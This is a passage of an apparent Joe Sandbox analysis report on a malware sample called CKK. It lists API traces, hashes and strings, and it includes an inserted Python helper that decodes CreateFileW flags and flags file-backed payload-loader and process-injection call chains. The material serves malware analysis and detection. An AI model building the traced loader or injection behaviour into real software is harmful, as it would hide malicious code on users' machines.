                                          • Opcode Fuzzy Hash: edabfae8857b9f2b0d488673203de7f344c6027160587d23f67ca3b683416563
                                          • Instruction Fuzzy Hash: FBF030755402947AEB3007236C08EB77E7DE7C6F50F11411AFA10A2164C2620841EE70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000), ref: 00E76258
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?), ref: 00E762DE
                                          • WideCharToMultiByte.KERNEL32 ref: 00E763D8
                                          • __freea.LIBCMT ref: 00E763E5
                                            • Part of subcall function 00E73820: RtlAllocateHeap.NTDLL(00000000,?,00F11444,?,00E5FDF5,?,?,00E4A976,00000010,00F11440,00E413FC,?,00E413C6,?,00E41129), ref: 00E73852
                                          • __freea.LIBCMT ref: 00E763EE
                                          • __freea.LIBCMT ref: 00E76413
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                          • String ID:
                                          • API String ID: 1414292761-0
                                          • Opcode ID: 81ccec10d1dc6d022e920557df7b2170ea01136aa5e5ebc9d6b63ec3ae1581a7
                                          • Instruction ID: 90ae7889a8b5f0f0e2f1ec6fbc365116a29fa2849fc69243361c20133a57b950
                                          • Opcode Fuzzy Hash: 81ccec10d1dc6d022e920557df7b2170ea01136aa5e5ebc9d6b63ec3ae1581a7
                                          • Instruction Fuzzy Hash: A8510272600616BFEB258F64DC81EAF77A9EB84758F249229FC09F6150EB34DC44C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          [Control-flow graph omitted: function 112410-1125dd; main path call 110000, call 112300, CreateFileW (112410-112521), VirtualAlloc (11253f-112559), ReadFile (11255d-112574), call 112340, call 111300, call 112390, ExitProcess (1125ce-1125d6); the short blocks 112523, 11253a, 11255b and 112576 each branch to the exit block 1125d8-1125dd]
                                          APIs
                                            • Part of subcall function 00112300: Sleep.KERNELBASE(000001F4), ref: 00112311
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00112517
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447471100.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_110000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: 8HQTGX6BSVHVPH
                                          • API String ID: 2694422964-767422031
                                          • Opcode ID: 0313425ca3b445e08516944835eba6c232b142d28b04bc0435b4a29c10db4284
                                          • Instruction ID: fbf111f880a86deb097082d34e2d9de61d9a545af8ac8c713f7a811ae91416f3
                                          • Opcode Fuzzy Hash: 0313425ca3b445e08516944835eba6c232b142d28b04bc0435b4a29c10db4284
                                          • Instruction Fuzzy Hash: FF519431D14249DBEF15DBA4C859BEFBB75AF19300F1041A8E618BB2C0D7790B89CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: File$Delete$Copy
                                          • String ID:
                                          • API String ID: 3226157194-0
                                          • Opcode ID: 23903cf9e9988e9d3f058a2a29eb8d809fbfaed23b8770048f1d389a0a8d0f30
                                          • Instruction ID: 74df4bf540242c12a642b7919f6b0f7ff8dd6a1e75fc6ea64051c57a71125987
                                          • Opcode Fuzzy Hash: 23903cf9e9988e9d3f058a2a29eb8d809fbfaed23b8770048f1d389a0a8d0f30
                                          • Instruction Fuzzy Hash: 0FB13A72A01119ABDF21DFA4DC85EDFBBBDEF48350F1050AAF609F6151EA309A448F61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          [Control-flow graph omitted: function e75aa9-e75cb4; WriteFile at e75c02-e75c23, followed on one branch by GetLastError (e75c25-e75c2b); internal subroutines e6f2c6, e6f2d9, e727ec, e60a8c, e79424, e7564e, e7542e, e755e1, e756c4, e75891, e757a3 and e6f2a3]
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: JO
                                          • API String ID: 0-1663374661
                                          • Opcode ID: 42e9b3fc98ac9d42533902c57b8753ebd6683c8a3567b622775da0b7d2c31167
                                          • Instruction ID: 711b3b0861085b4973cd48a19efda04023994b12bed7da3b534e520157357ea4
                                          • Opcode Fuzzy Hash: 42e9b3fc98ac9d42533902c57b8753ebd6683c8a3567b622775da0b7d2c31167
                                          • Instruction Fuzzy Hash: CE51CD72D0060A9FCB21DFA4D845BFEBBB8EF05314F14A15AF409B7291D7B19A019B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegOpenKeyExW.KERNEL32 ref: 00E43B40
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00E43B61
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E43B83
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: 482f5a63ae74c4e05fc42eeb24220e8eb646d3054667ce40dfdb7971b4ba7af5
                                          • Instruction ID: 5517fabbf46f0f47191e03271727cad77295ae5b31aeaf5da3a64507aa719665
                                          • Opcode Fuzzy Hash: 482f5a63ae74c4e05fc42eeb24220e8eb646d3054667ce40dfdb7971b4ba7af5
                                          • Instruction Fuzzy Hash: DD112AB5511208FFDB218FA5EC44AEEB7B9EF04784B10955AA805E7110D2319E449760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • Variable must be of type 'Object'., xrefs: 00E932B7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Variable must be of type 'Object'.
                                          • API String ID: 0-109567571
                                          • Opcode ID: 7bd07fe17cc7defa20d68765f34c8aaba96b0332242e3c7b2d19799c7360434d
                                          • Instruction ID: 25214fb3b4ee4f34f3f1288e1d1713307c271fe48d9f8bcbf837f97f71c3d690
                                          • Opcode Fuzzy Hash: 7bd07fe17cc7defa20d68765f34c8aaba96b0332242e3c7b2d19799c7360434d
                                          • Instruction Fuzzy Hash: 90C27875A00214CFCB24CFA8E881AADB7F1BF08314F24A569E956BB391D375ED41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$ErrorLast
                                          • String ID:
                                          • API String ID: 3177248105-0
                                          • Opcode ID: 492e43957e03f317f6591a1216bf2ead11818b31cdd5c8966ef342e7ca15e91c
                                          • Instruction ID: 4ed08233c0a1dd1baa08a69a5f79447377f5317844673ada44cd45e898e277f6
                                          • Opcode Fuzzy Hash: 492e43957e03f317f6591a1216bf2ead11818b31cdd5c8966ef342e7ca15e91c
                                          • Instruction Fuzzy Hash: A5014732342223AFCB704B79AC44A977B98EF05BA1B208321F909F3180CB21C945D6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 00E4FE66
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Init_thread_footer
                                          • String ID:
                                          • API String ID: 1385522511-0
                                          • Opcode ID: 20d494278d5ac313ef42284a2685101f40e7232b2028581d8b12a04d9fa613f7
                                          • Instruction ID: f0e4fcc02e61e5fc390bf3e2e4994d8704ad61a0974b91b48dfbe65c28a2bb97
                                          • Opcode Fuzzy Hash: 20d494278d5ac313ef42284a2685101f40e7232b2028581d8b12a04d9fa613f7
                                          • Instruction Fuzzy Hash: FFB29C74A08340CFCB24CF18E480A6AB7E1BF89714F24596DF895AB3A1D771EC45DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00E60668
                                            • Part of subcall function 00E632A4: RaiseException.KERNEL32(?,?,?,00E6068A), ref: 00E63304
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00E60685
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw$ExceptionRaise
                                          • String ID: Unknown exception
                                          • API String ID: 3476068407-410509341
                                          • Opcode ID: b9283e463f9a110c35e81b05c4a870df31c7c8e50566476e39cdd2aa4dc65054
                                          • Instruction ID: 9585e581713404c449f4be6c813168585c34981d32777ec502192bf1911aa1d0
                                          • Opcode Fuzzy Hash: b9283e463f9a110c35e81b05c4a870df31c7c8e50566476e39cdd2aa4dc65054
                                          • Instruction Fuzzy Hash: 6BF0C23498020D77CB00BAB4FC56D9E77BC5E403D4B606531F914B69E2EF71DA6AC681
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00EB302F
                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00EB3044
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Temp$FileNamePath
                                          • String ID: aut
                                          • API String ID: 3285503233-3010740371
                                          • Opcode ID: 90d190593a44918596161014c23cc717ae715431e2aaa29c13d85cb138f084f0
                                          • Instruction ID: aae1dcb79f1b4d651246a440150005793c99785265ecbe46acd2a05e95d67987
                                          • Opcode Fuzzy Hash: 90d190593a44918596161014c23cc717ae715431e2aaa29c13d85cb138f084f0
                                          • Instruction Fuzzy Hash: 75D05B71501314AFDA20A795AC0DFC73B6CD704750F000252B655E20E1DAB4D544CAD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNEL32(?,00000000), ref: 00111B2D
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00111B73
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447471100.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_110000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$CreateMemoryRead
                                          • String ID:
                                          • API String ID: 2726527582-0
                                          • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                          • Instruction ID: c458747ba9b2b48e2356c8e0afab58258532de3e24bb40031e70129b58607ff6
                                          • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                          • Instruction Fuzzy Hash: 07620A30A14258DBEB28CFA4C851BDEB376EF58300F1091A9D60DEB394E7759E81CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%
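The function records above print Win32 arguments as bare hex, and the interesting facts (the 0x110000 region is not a mapped image, its loader opens a file and reads it into VirtualAlloc'd memory, and a sibling function pairs CreateProcessW with ReadProcessMemory) have to be read out of the CFG dump and the APIs lines by hand. The following Python is an added example, not part of the Joe Sandbox report or its plugin: it parses APIs lines of the form shown in this report, names the CreateFileW parameters with the standard Win32 constants, and flags ordered call chains an analyst would look for. The sample CFG text and API lines are copied from the two records this example serves (112410 and 00111B2D); the chain labels are this example's own heuristics, not sandbox signature names.

```python
import re

# One "APIs" line of a Joe Sandbox function record, e.g.
#   CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00112517
#   RegOpenKeyExW.KERNEL32 ref: 00E43B40                 (no argument list recorded)
#   Part of subcall function 00112300: Sleep.KERNELBASE(000001F4), ref: 00112311
API_LINE = re.compile(
    r"(?P<api>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Standard Win32 constants for the CreateFileW parameters (winnt.h / fileapi.h).
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRIBUTES = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
                   0x80: "FILE_ATTRIBUTE_NORMAL", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
                   0x40000000: "FILE_FLAG_OVERLAPPED"}

# Ordered call chains worth a second look inside one function. The labels are
# analyst heuristics written for this example, not Joe Sandbox signature names.
CHAINS = {
    ("CreateFileW", "VirtualAlloc", "ReadFile"):
        "reads a file into freshly allocated memory (file-backed payload loader)",
    ("CreateProcessW", "ReadProcessMemory"):
        "spawns a process and reads its memory (staging for injection/hollowing)",
    ("GetTempPathW", "GetTempFileNameW"):
        "creates a temp file with a fixed prefix (AutoIt-compiled binaries use 'aut')",
}


def parse_api_line(line):
    """Return {'api', 'module', 'args', 'ref'} for one APIs line, or None if it is not one."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = []
    if m.group("args"):
        for a in m.group("args").split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))  # '?' = value not recovered
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def flag_names(value, table):
    """Render a bitmask as 'A|B'; bits the table does not know stay as hex so nothing is hidden."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return "|".join(names) if names else "0"


def decode_createfilew(args):
    """Name the seven CreateFileW parameters as the sandbox recorded them."""
    if len(args) != 7:
        raise ValueError("CreateFileW takes seven arguments, got %d" % len(args))
    name, access, share, sec_attrs, disposition, attrs, template = args
    return {
        "lpFileName": "?" if name is None else hex(name),
        "dwDesiredAccess": flag_names(access, GENERIC_ACCESS),
        "dwShareMode": flag_names(share, SHARE_MODE),
        "lpSecurityAttributes": sec_attrs,
        "dwCreationDisposition": CREATE_DISPOSITION.get(disposition, disposition),
        "dwFlagsAndAttributes": flag_names(attrs, FILE_ATTRIBUTES),
        "hTemplateFile": template,
    }


def called_apis(cfg_text):
    """Pull the Win32 names, in block order, out of a control_flow_graph dump.
    API names are CamelCase; block ids, addresses, edges and 'call' are not."""
    return [t for t in cfg_text.split() if re.fullmatch(r"[A-Z][A-Za-z0-9]*", t)]


def classify(api_names):
    """Labels of every chain that occurs as an ordered subsequence of api_names."""
    hits = []
    for chain, label in CHAINS.items():
        it = iter(api_names)
        if all(name in it for name in chain):  # 'in' on an iterator keeps the order
            hits.append(label)
    return hits


# Constructed input: the CFG dump and APIs lines of two records from this report
# (0x110000 region, "based on PE: false", i.e. code that is not a mapped image).
SAMPLE_CFG = ("control_flow_graph 840 112410-112521 call 110000 call 112300 CreateFileW "
              "847 112523 840->847 848 112528-112538 840->848 852 11253f-112559 VirtualAlloc "
              "854 11255d-112574 ReadFile 856 112578-1125b2 call 112340 call 111300 "
              "862 1125ce-1125d6 ExitProcess")
SAMPLE_API_LINES = [
    "Part of subcall function 00112300: Sleep.KERNELBASE(000001F4), ref: 00112311",
    "CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00112517",
    "CreateProcessW.KERNEL32(?,00000000), ref: 00111B2D",
    "ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00111B73",
]

if __name__ == "__main__":
    calls = [c for c in map(parse_api_line, SAMPLE_API_LINES) if c]
    for c in calls:
        if c["api"] == "CreateFileW":
            print(decode_createfilew(c["args"]))
    print(classify(called_apis(SAMPLE_CFG)))
    print(classify([c["api"] for c in calls]))
```

Run against the lines above, the CreateFileW call decodes to GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE, OPEN_EXISTING and FILE_ATTRIBUTE_NORMAL, i.e. a plain read of an existing file whose name the sandbox did not recover; the CFG yields the loader chain and the APIs lines yield the CreateProcessW/ReadProcessMemory chain. Unknown bits are kept as hex rather than dropped so a decoder bug cannot hide a FILE_FLAG_DELETE_ON_CLOSE or similar.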

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$CurrentFreeLibraryTerminate
                                          • String ID:
                                          • API String ID: 146820519-0
                                          • Opcode ID: cefc9f8ec62254a7b61987cdb4575f1e97562b0b8c9487f77737716450db8657
                                          • Instruction ID: 6ee3f3d604d3f336667d1f60f7af9586a280c574692c8c4f180b0a73a8215c48
                                          • Opcode Fuzzy Hash: cefc9f8ec62254a7b61987cdb4575f1e97562b0b8c9487f77737716450db8657
                                          • Instruction Fuzzy Hash: 05127D71A083419FC714DF28C684B5ABBE1FF84318F14995DE899AB352CB31ED46CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E41BF4
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E41BFC
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E41C07
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E41C12
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E41C1A
                                            • Part of subcall function 00E41BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E41C22
                                            • Part of subcall function 00E41B4A: RegisterWindowMessageW.USER32(00000004,?,00E412C4), ref: 00E41BA2
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00E4136A
                                          • OleInitialize.OLE32 ref: 00E41388
                                          • CloseHandle.KERNEL32(00000000), ref: 00E824AB
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                          • String ID:
                                          • API String ID: 1986988660-0
                                          • Opcode ID: 51fdbf469deb4705ee23785a84b54887528a7636cd9c92a4c6d61db35956947d
                                          • Instruction ID: e58b9c5764e5d69171d959777851b6670a220d84d5ebc0884d94e53f86604e78
                                          • Opcode Fuzzy Hash: 51fdbf469deb4705ee23785a84b54887528a7636cd9c92a4c6d61db35956947d
                                          • Instruction Fuzzy Hash: A471BBB49122098EC784DF7ABD556D53AE2FBC939431AD22ED30AE7362EB304445EF44
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          • SetFilePointerEx.KERNELBASE ref: 00E4556D
                                          • SetFilePointerEx.KERNELBASE ref: 00E4557D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID:
                                          • API String ID: 2583163307-0
                                           Uniqueness
                                           • Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00EB2FF2
                                          • SetFileTime.KERNELBASE ref: 00EB3006
                                          • CloseHandle.KERNEL32(00000000), ref: 00EB300D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                           • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
